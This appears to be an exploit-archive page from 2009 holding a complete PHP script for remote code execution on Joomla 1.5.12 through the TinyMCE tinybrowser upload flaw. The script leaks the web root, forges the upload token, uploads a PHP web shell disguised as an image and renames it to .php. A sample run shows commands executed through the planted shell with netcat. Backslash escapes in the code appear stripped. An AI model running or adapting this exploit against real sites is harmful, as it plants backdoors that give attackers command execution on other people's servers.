[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Joomla 1.5.12 RCE via TinyMCE upload vulnerability
# Published : 2009-11-19
# Author : daath
# Previous Title : Joomla Component Com_Joomclip (cat) SQL injection
# Next Title : Shoutbox 1.0 HTML / Xss Injection


<?php

/**
 ** Joomla 1.5.12 Remote Code Execution via TinyMCE upload vulnerability
 **
 ** Tested against :
 ** - Joomla 1.5.12 / Ubuntu 8.10 / Apache 2.2.9
 ** - Joomla 1.5.12 / Windows XP SP2 / Apache 2.2.12
 **
 **  Luca "daath" De Fulgentis - daath [at] nibblesec.org
 **  http://blog.nibblesec.org
 **
 **/

/*
daath@shaytan:~$ php pwnoomla.php localhost /joomla

 [-] Joomla 1.5.12 RCE via TinyMCE upload vulnerability [-]

 [#] Attacking localhost:80/joomla/
 [+] Web root pathname is : /var/www/
 [+] Magic token is a8de65e217ed779dbda80eb04502a2da
 [#] Creating remote directory ... DONE
 [#] Uploading image ... DONE
 [#] Renaming image's extension (takes a while) ... PWNED!
 [+] Here is the php shell : /joomla/images/stories/i208661849/shell.php

daath@shaytan:~$ echo -e "GET /joomla/images/stories/i208661849/shell.php?cmd=ls%20-al%20shell.php HTTP/1.0nn" | nc localhost 80
HTTP/1.1 200 OK
Date: Mon, 28 Sep 2009 10:39:43 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.3 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

-rw-r--r-- 1 www-data www-data 54 Sep 28 12:39 shell.php
daath@shaytan:~$ 
*/


 $host = "localhost";
 $port = "80";
 $install_path = "/";

 $path    = "/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser";
 $dir     = "/tinybrowser.php?type=image&folder=";
 $upload  = "/upload_file.php";
 $rename  = "/edit.php?type=file&folder=";

 /*
  * PHP shell
  */
 $php_shell = "<?php if(isset($_GET["cmd"])) system($_GET["cmd"]); ?>";

 echo "n [-] Joomla 1.5.12 RCE via TinyMCE upload vulnerability [-]nn";

 if($argc < 2) {
  echo " Usage: php {$argv[0]} host joomla_install_pathn";
  echo " Example : php {$argv[0]} localhost /joomla/ nn";
  exit(1);
 }

 $host = $argv[1];

 if($argc == 3) {
  $install_path = $argv[2][0] == "/" ? $argv[2] : "/".$argv[2];
  $install_path = $argv[2][strlen($install_path)-1] == "/" ? $install_path : $install_path."/";
 }

 echo " [#] Attacking {$host}:{$port}{$install_path}n";

 $resp = HTTPRequest("GET {$install_path}/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php HTTP/1.0rnrn");
 if(strstr($resp, "Restricted access")) {
  die(" [-] Joomla is NOT vulnerable, exiting.nn");
 }

 $webroot = get_webroot_pathname();
 if($webroot == "") {
  die(" [-] Web root pathname NOT FOUND, exiting.nn");
 }
 
 echo " [+] Web root pathname is : {$webroot}n";

 $seed = md5($webroot . "s0merand0mjunk!!!111");
 echo " [+] Magic token is {$seed}n";

 $my_dir = "i" . rand();
 echo " [#] Creating remote directory ... ";
 $resp = HTTPRequest("GET {$install_path}{$path}{$dir}/{$my_dir} HTTP/1.0rnrn");

 if(!strstr($resp, "directory has been successfully created")) {
  die("FAILEDn [-] Error - creating directory, exiting.nn");
 }
 echo "DONEn";

 $my_shell = md5(time());
 echo " [#] Uploading image ... ";

 $data  = "--1234567rn";
 $data .= "Content-Disposition: form-data; name="Filedata"; filename="{$my_shell}.png"rnrn";
 $data .= "{$php_shell}rn";
 $data .= "--1234567--rn";

 $req  = "POST {$install_path}{$path}{$upload}" . "?obfuscate={$seed}&type=file&folder={$install_path}images/stories/{$my_dir} HTTP/1.1rn";
 $req .= "Host: {$host}rn";
 $req .= "Content-Length: ".strlen($data)."rn";
 $req .= "Content-Type: multipart/form-data; boundary=1234567rn";
 $req .= "Connection: closernrn";
 $req .= $data; 

 $resp = HTTPRequest($req);

 if (!strstr($resp,"File Upload Success")) {
  die("FAILEDn [-] Error - image uploading, exiting.nn");
 }
 echo "DONEn";

 echo " [#] Renaming image's extension (takes a while) ... ";

 $data  = "actionfile%5B0%5D={$my_shell}.png_&renameext%5B0%5D=php&renamefile%5B0%5D=shell.&sortby=name";
 $data .= "&sorttype=asc&find=&showpage=0&action=rename&commit=rnrn";

 $req  = "POST {$install_path}{$path}/edit.php?type=image&folder={$my_dir}%2F HTTP/1.1n";
 $req .= "Host: {$host}rn";
 $req .= "Content-Type: application/x-www-form-urlencodedrn";
 $req .= "Content-Length: " . strlen($data) . "rnrn";
 $req .= $data;

 $resp = HTTPRequest($req);

 if(!strstr($resp, "1 files have been successfully renamed")) {
  die("FAILEDn [-] Error - image's extension renaming, exiting.n");
 }
 echo "PWNED!n";

 echo " [+] Here is the php shell : {$install_path}images/stories/{$my_dir}/shell.phpnn";
 exit;

 function get_webroot_pathname() {

  global $install_path;

  $resp = HTTPRequest("GET {$install_path}/libraries/joomla/utilities/compat/php50x.php HTTP/1.rnrn");

  $pos1 = strpos($resp, "in <b>");
  $pos2 = strpos($resp, "libraries");

  if($pos1 === false || $pos2 === false)
   return "";

  $init = $pos1 +strlen("in <b>");

  $str = substr($resp, $init, $pos2-$init);

  if($install_path != "/") {

   $install_path2 = str_replace("/", "", $install_path);

   $pos1 = strrpos($str, $install_path2);

   if($pos1 === false)
    return "";

   $str = substr($str, 0, $pos1-1);
  }

  if($str[strlen($str)-1] == "\")
   $str = substr($str, 0, $pos-1);

  if(strstr($str, "/") && $str[strlen($str)-1] != "/")
   $str = $str . "/";

  $pathname = str_replace("\", "/", $str);
  return $pathname;
 }

 function HTTPRequest($req) {

  global $host, $port;

  $s = @fsockopen($host, $port, $errno, $errstr, 10);
  if(!$s) {
   die("n [-] Error in connection, exiting.nn");
  }

  fputs($s, $req);
  $resp = "";
  while(!feof($s)) {
   $resp .= fgets($s);
  }
  fclose($s);

  return $resp;
 }
?>